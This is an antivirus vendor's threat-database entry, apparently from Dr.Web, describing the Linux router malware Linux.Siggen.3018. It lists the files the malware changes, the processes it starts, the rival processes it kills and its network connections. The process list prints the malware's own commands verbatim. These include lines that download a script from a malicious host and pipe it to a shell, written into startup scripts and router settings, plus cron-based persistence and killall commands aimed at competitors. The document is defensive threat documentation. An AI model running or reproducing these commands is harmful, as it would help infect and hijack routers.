Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Linux.Siggen.3018

Added to the Dr.Web virus database: 2020-05-19

Virus description added:

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /etc/init.d/rcS.bak
  • /etc/init.d/rcS
  • /etc/persistent/rc.poststart
  • /var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Modifies router settings:
  • /bin/nvram
  • /bin/cfgmtd
Launches processes:
  • sh -c cat /etc/init.d/rcS | grep -v \"wget\" > /etc/init.d/rcS.bak
  • cat /etc/init.d/rcS
  • grep -v wget
  • sh -c echo \"sleep 300 && wget -qO - http://fkd.derpcity.ru/nvr | sh &\" > /etc/init.d/rcS
  • sh -c cat /etc/init.d/rcS.bak >> /etc/init.d/rcS
  • cat /etc/init.d/rcS.bak
  • sh -c rm -rf /etc/init.d/rcS.bak
  • rm -rf /etc/init.d/rcS.bak
  • sh -c nvram set rc_firewall=\"sleep 120 && wget -qO - http://fkd.derpcity.ru/nvr | sh\" > /dev/null 2>&1
  • sh -c nvram commit > /dev/null 2>&1
  • sh -c ( echo \"sleep 120 && wget -q -O - http://fkd.derpcity.ru/nvr | sh > /dev/null 2>&1 &\" > /etc/persistent/rc.poststart ) > /dev/null 2>&1
  • sh -c chmod 755 /etc/persistent/rc.poststart > /dev/null 2>&1
  • chmod 755 /etc/persistent/rc.poststart
  • sh -c cfgmtd -w -p /etc/ > /dev/null 2>&1
  • sh -c ( cfgmtd -w -p /etc/ && sleep 432000 && reboot & ) > /dev/null 2>&1
  • sh -c rm -rf /var/run/wgsh > /dev/null 2>&1 &
  • sleep 432000
  • sh -c rm -rf /var/run/bbsh > /dev/null 2>&1 &
  • rm -rf /var/run/wgsh
  • sh -c rm -rf /var/run/tty0 > /dev/null 2>&1 &
  • rm -rf /var/run/bbsh
  • sh -c rm -rf /var/run/tty1 > /dev/null 2>&1 &
  • rm -rf /var/run/tty0
  • sh -c rm -rf /var/run/tty2 > /dev/null 2>&1 &
  • rm -rf /var/run/tty1
  • sh -c rm -rf /var/run/tty3 > /dev/null 2>&1 &
  • rm -rf /var/run/tty2
  • rm -rf /var/run/tty3
  • sh -c rm -rf /var/run/tty4 > /dev/null 2>&1 &
  • rm -rf /var/run/tty4
  • sh -c rm -rf /var/run/tty5 > /dev/null 2>&1 &
  • sh -c rm -rf /tmp/tty0 > /dev/null 2>&1 &
  • rm -rf /var/run/tty5
  • sh -c rm -rf /tmp/tty1 > /dev/null 2>&1 &
  • rm -rf /tmp/tty0
  • sh -c rm -rf /tmp/tty2 > /dev/null 2>&1 &
  • rm -rf /tmp/tty1
  • rm -rf /tmp/tty2
  • sh -c rm -rf /tmp/tty3 > /dev/null 2>&1 &
  • sh -c rm -rf /tmp/tty4 > /dev/null 2>&1 &
  • rm -rf /tmp/tty3
  • sh -c rm -rf /tmp/tty5 > /dev/null 2>&1 &
  • rm -rf /tmp/tty4
  • sh -c rm -rf /var/run/pty > /dev/null 2>&1 &
  • rm -rf /tmp/tty5
  • sh -c killall -9 arm > /dev/null 2>&1 &
  • rm -rf /var/run/pty
  • sh -c killall -9 mips > /dev/null 2>&1 &
  • sh -c killall -9 mipsel > /dev/null 2>&1 &
  • sh -c killall -9 powerpc > /dev/null 2>&1 &
  • sh -c killall -9 ppc > /dev/null 2>&1 &
  • sh -c killall -9 daemon.armv4l.mod > /dev/null 2>&1 &
  • sh -c killall -9 daemon.i686.mod > /dev/null 2>&1 &
  • sh -c killall -9 daemon.mips.mod > /dev/null 2>&1 &
  • sh -c killall -9 daemon.mipsel.mod > /dev/null 2>&1 &
  • sh -c kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &
  • sh -c rm -rf /tmp/.xs/* > /dev/null 2>&1 &
  • cat /tmp/.xs/*.pid
  • rm -rf /tmp/.xs/*
  • sh -c chmod 700 <SAMPLE_FULL_PATH> > /dev/null 2>&1 &
  • chmod 700 <SAMPLE_FULL_PATH>
  • sh -c touch -acmr /bin/ls <SAMPLE_FULL_PATH>
  • touch -acmr /bin/ls <SAMPLE_FULL_PATH>
  • sh -c (crontab -l | grep -v \"<SAMPLE_FULL_PATH>\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1
  • crontab -l
  • grep -v <SAMPLE_FULL_PATH>
  • grep -v no cron
  • grep -v lesshts/run.sh
  • sh -c echo \"* * * * * <SAMPLE_FULL_PATH> > /dev/null 2>&1 &\" >> /var/run/.x001804289383
  • sh -c crontab /var/run/.x001804289383
  • crontab /var/run/.x001804289383
  • sh -c rm -rf /var/run/.x001804289383
  • rm -rf /var/run/.x001804289383
  • sh -c /bin/uname -n
  • sh -c nvram get router_name
  • /bin/uname -n
Attempts to kill the following processes:
  • killall -9 mips
  • killall -9 mipsel
  • killall -9 powerpc
  • killall -9 ppc
  • killall -9 daemon.armv4l.mod
  • killall -9 daemon.i686.mod
  • killall -9 daemon.mips.mod
  • killall -9 daemon.mipsel.mod
Performs operations with the file system:
Modifies file access rights:
  • <SAMPLE_FULL_PATH>
  • /var/spool/cron/crontabs/tmp.WuzwRY
Creates or modifies files:
  • /var/run/.x001804289383
  • /run/.x001804289383
  • /var/spool/cron/crontabs/tmp.WuzwRY
Deletes files:
  • /etc/init.d/rcS.bak
  • /var/run/wgsh
  • /var/run/bbsh
  • /var/run/tty0
  • /var/run/tty1
  • /var/run/tty2
  • /var/run/tty3
  • /var/run/tty4
  • /var/run/tty5
  • /tmp/tty0
  • /tmp/tty1
  • /tmp/tty2
  • /tmp/tty3
  • /tmp/tty4
  • /tmp/tty5
  • /var/run/pty
  • /tmp/.xs/*
  • /var/run/.x001804289383
Network activity:
Awaits incoming connections on ports:
  • 127.0.0.1:63008
Establishes connection:
  • 10#.#.46.2:8080
  • 12#.##4.15.55:8080
  • 21#.##3.199.98:8080
  • 66.###.182.1:8080
Other:
Collects OS information

Recommandations pour le traitement


Linux

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

Version démo gratuite

Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)

Télécharger Dr.Web

Par le numéro de série